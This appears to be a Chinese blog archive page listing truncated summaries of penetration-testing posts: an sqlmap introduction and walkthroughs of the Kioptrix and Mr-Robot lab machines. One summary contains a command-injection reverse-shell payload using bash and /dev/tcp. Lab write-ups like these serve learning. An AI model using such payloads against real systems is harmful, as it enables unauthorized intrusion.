12 2021 档案
摘要:> 原文地址 zhuanlan.zhihu.com 一、Sqlmap 简介 开源的 SQL 注入漏洞检测的工具,能够检测动态页面中的 get/post 参数,cookie,http 头,还能够查看数据,文件系统访问,甚至能够操作系统命令执行。 检测方式:布尔盲注、时间盲注、报错注入、UNION 联
阅读全文
摘要:# kioprtix level 1.2 存活探测+端口扫描 访问80 同时做一个目录扫描 发现 http://10.0.4.18/phpmyadmin/index.php 指纹识别 cms漏洞查找 测试代码执行,存在漏洞 反弹shell github找到poc git clone https:/
阅读全文
摘要:# kioptrix level-1.1 存活检测 端口扫描 80访问 查看源代码 尝试爆破,先试一下,无结果 尝试万能密码,sql注入 万能密码可以绕过登录 替换数据包进行登录 登录成功 命令执行 反弹shell 127.0.0.1 | bash -i >& /dev/tcp/192.168.2
阅读全文
摘要:# kioptrix 存活探测 端口扫描 服务识别 可测试139 目录扫描 没什么可利用的 139端口渗透 使用msf查询靶机samba版本 msf6 > search smb_version Matching Modules # Name Disclosure Date Rank Check D
阅读全文
摘要:# Myrebot 存活探测 端口扫描 开放80 22 443 访问80 访问页面 是一个命令行界面,输入提示的join,看到如下的界面 习惯性看一下源码,看到这些,应该是wordpress的网站 目录扫描 sudo dirsearch -u http://10.0.4.17 -e * 存在的页面
阅读全文
